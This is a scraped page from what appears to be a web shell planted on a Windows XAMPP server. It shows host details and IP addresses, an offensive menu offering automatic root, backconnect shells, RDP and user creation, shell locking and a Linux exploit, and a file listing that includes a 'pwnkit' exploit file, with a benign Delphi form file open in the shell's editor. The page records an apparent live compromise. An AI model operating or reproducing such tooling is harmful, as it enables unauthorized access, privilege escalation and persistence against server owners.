Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
src /
xampp-control-panel /
[ HOME SHELL ]
Name
Size
Permission
Action
gfx
[ DIR ]
drwxrwxrwx
locale
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
VersInfo.pas
42.97
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
default.po
32.22
KB
-rw-rw-rw-
ggexclude.cfg
227
B
-rw-rw-rw-
gnugettext.pas
114.84
KB
-rw-rw-rw-
ignore.po
7.28
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
sonar-project.properties
464
B
-rw-rw-rw-
uApache.pas
15.79
KB
-rw-rw-rw-
uBaseModule.pas
2.25
KB
-rw-rw-rw-
uConfig.dfm
14.81
KB
-rw-rw-rw-
uConfig.pas
4.43
KB
-rw-rw-rw-
uConfigUserDefined.dfm
14.73
KB
-rw-rw-rw-
uConfigUserDefined.pas
3.36
KB
-rw-rw-rw-
uExceptionDialog.dcu
32.71
KB
-rw-rw-rw-
uExceptionDialog.dfm
2.08
KB
-rw-rw-rw-
uExceptionDialog.pas
27.37
KB
-rw-rw-rw-
uFileZilla.pas
14.85
KB
-rw-rw-rw-
uGetWinVersionInfo.dcu
8.09
KB
-rw-rw-rw-
uGetWinVersionInfo.pas
11.13
KB
-rw-rw-rw-
uHelp.dfm
3.18
KB
-rw-rw-rw-
uHelp.pas
1.81
KB
-rw-rw-rw-
uJclSysInfo.pas
22.05
KB
-rw-rw-rw-
uLanguage.dfm
12.95
KB
-rw-rw-rw-
uLanguage.pas
2
KB
-rw-rw-rw-
uLogOptions.dfm
6.42
KB
-rw-rw-rw-
uLogOptions.pas
2.1
KB
-rw-rw-rw-
uMain.dfm
217.14
KB
-rw-rw-rw-
uMain.pas
39.26
KB
-rw-rw-rw-
uMercury.pas
11.42
KB
-rw-rw-rw-
uMySQL.pas
13.95
KB
-rw-rw-rw-
uNetstat.dfm
3.53
KB
-rw-rw-rw-
uNetstat.pas
7.95
KB
-rw-rw-rw-
uNetstatTable.pas
7.58
KB
-rw-rw-rw-
uProcesses.pas
6.25
KB
-rw-rw-rw-
uProcesses_new.pas
2.14
KB
-rw-rw-rw-
uServiceSettings.dfm
16.89
KB
-rw-rw-rw-
uServiceSettings.pas
8.26
KB
-rw-rw-rw-
uServices.pas
6.14
KB
-rw-rw-rw-
uTomcat.pas
15.9
KB
-rw-rw-rw-
uTools.pas
26.61
KB
-rw-rw-rw-
xampp_control3.dpr
2.21
KB
-rw-rw-rw-
xampp_control3.dproj
30.26
KB
-rw-rw-rw-
xampp_control3.dproj.local
38.45
KB
-rw-rw-rw-
xampp_control3.drc
78.46
KB
-rw-rw-rw-
xampp_control3.dres
37.08
KB
-rw-rw-rw-
xampp_control3.identcache
1.29
KB
-rw-rw-rw-
xampp_control3.stat
170
B
-rw-rw-rw-
xampp_control3Resource.rc
341
B
-rw-rw-rw-
xampp_control3_project.tvsconf...
72
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : uNetstat.dfm
object fNetstat: TfNetstat Left = 394 Top = 196 BorderStyle = bsSizeToolWin Caption = 'Netstat - TCP Listening sockets' ClientHeight = 758 ClientWidth = 826 Color = clBtnFace Font.Charset = DEFAULT_CHARSET Font.Color = clWindowText Font.Height = -14 Font.Name = 'Arial' Font.Style = [] OldCreateOrder = False Position = poScreenCenter OnClose = FormClose OnCreate = FormCreate OnDestroy = FormDestroy OnShow = FormShow DesignSize = ( 826 758) PixelsPerInch = 120 TextHeight = 16 object lvSockets: TListView Left = 5 Top = 37 Width = 816 Height = 691 Margins.Left = 4 Margins.Top = 4 Margins.Right = 4 Margins.Bottom = 4 Anchors = [akLeft, akTop, akRight, akBottom] Columns = < item Caption = 'Address' Width = 131 end item Alignment = taRightJustify Caption = 'Port' Width = 65 end item Alignment = taRightJustify Caption = 'PID' Width = 65 end item Caption = 'Name' Width = 200 end> DoubleBuffered = True Font.Charset = DEFAULT_CHARSET Font.Color = clWindowText Font.Height = -14 Font.Name = 'Arial' Font.Style = [] OwnerData = True ReadOnly = True RowSelect = True ParentDoubleBuffered = False ParentFont = False TabOrder = 0 ViewStyle = vsReport OnColumnClick = lvSocketsColumnClick OnCustomDrawItem = lvSocketsCustomDrawItem OnData = lvSocketsData end object bRefresh: TBitBtn Left = 718 Top = 5 Width = 98 Height = 28 Margins.Left = 4 Margins.Top = 4 Margins.Right = 4 Margins.Bottom = 4 Anchors = [akTop, akRight] Caption = 'Refresh' ModalResult = 4 NumGlyphs = 2 TabOrder = 1 OnClick = bRefreshClick end object sbMain: TStatusBar Left = 0 Top = 739 Width = 826 Height = 19 Margins.Left = 4 Margins.Top = 4 Margins.Right = 4 Margins.Bottom = 4 Panels = <> end object pnlActiveExample: TPanel Left = 5 Top = 5 Width = 105 Height = 24 Margins.Left = 4 Margins.Top = 4 Margins.Right = 4 Margins.Bottom = 4 Caption = 'Active socket' Color = clWindow Font.Charset = DEFAULT_CHARSET Font.Color = clWindowText Font.Height = -15 Font.Name = 'Arial' Font.Style = [] ParentBackground = False ParentFont = False TabOrder = 3 end object pnlOldExample: TPanel Left = 230 Top = 5 Width = 105 Height = 24 Margins.Left = 4 Margins.Top = 4 Margins.Right = 4 Margins.Bottom = 4 Caption = 'Old socket' Color = clMaroon Font.Charset = DEFAULT_CHARSET Font.Color = clWhite Font.Height = -15 Font.Name = 'Arial' Font.Style = [] ParentBackground = False ParentFont = False TabOrder = 4 end object pnlNewExample: TPanel Left = 118 Top = 5 Width = 104 Height = 24 Margins.Left = 4 Margins.Top = 4 Margins.Right = 4 Margins.Bottom = 4 Caption = 'New socket' Color = clLime Font.Charset = DEFAULT_CHARSET Font.Color = clWindowText Font.Height = -15 Font.Name = 'Arial' Font.Style = [] ParentBackground = False ParentFont = False TabOrder = 5 end object TimerUpdate: TTimer Interval = 500 OnTimer = TimerUpdateTimer Left = 44 Top = 84 end end
Close